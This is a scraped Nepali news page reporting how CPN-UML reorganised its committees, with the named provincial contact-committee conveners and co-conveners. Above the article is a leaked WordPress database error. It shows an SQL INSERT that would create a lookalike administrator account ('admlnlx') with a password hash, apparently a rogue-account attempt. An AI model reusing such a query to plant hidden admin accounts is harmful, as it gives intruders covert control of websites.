WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BFsWg3Jx4.cDyTJ8h0ju8f3iGmtE9B.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 01:50:31', '', 'admlnlx', 'admlnlx')
काठमाडौ,माघ १७-
नेकपा एमालेले प्रादेशिक संरचनामा सबै पार्टी कमिटीहरुलाई पुनगर्ठन गर्ने क्रममा १४ ओटा अञ्चल सम्पर्क कमिटीहरु विघटन गरेको छ ।
एमालेले आज ७ ओटा प्रादेशिक सम्पर्क कमिटी गठन गरिएको छ । एमाले केन्द्रीय कार्यालयमा बसेको विभागको बैठकले प्रदेश नम्बर ४ बाहेक अन्य ६ ओटा प्रदेशक सम्पर्क कमिटीलाई पूर्णता दिएको हो ।
एमालेले प्रदेश नम्बर १ को संयोजकमा इन्द्र भण्डारी र सहसंयोजकमा नन्दकुमार राईलाई जिम्मेवारी दिएको छ । भण्डारी अध्यक्ष ओलीका प्रमुख स्वकीय सचिव हुन् । त्यस्तै प्रदेश नम्बर २ को संयोजकमा बिल्टु यादव र सहसंयोजक दिवाकर राज भट्टराई तोकिएका छन् । प्रदेश नम्बर ३ को संयोजक श्यामकुमार बस्नेत र सहसंयोजक अशोककुमार ठकुरी चयन भएका छन्।
त्यस्तै प्रदेश नम्बर ५ को संयोजकमा थानेश्वर बस्याल र सहसंयोजक भोजविक्रम बुढामगर चयन भएका छन् । प्रदेश नम्बर ६ को संयोजकमा तुलाराज सिम्खडा छन् भने प्रदेश नम्बर ७ को संयोजकमा शिव ठकुल्ला र सहसंयोजक प्रेमराज भट्टलाई जिम्मा दिइएको एमालेले जनाएको छ ।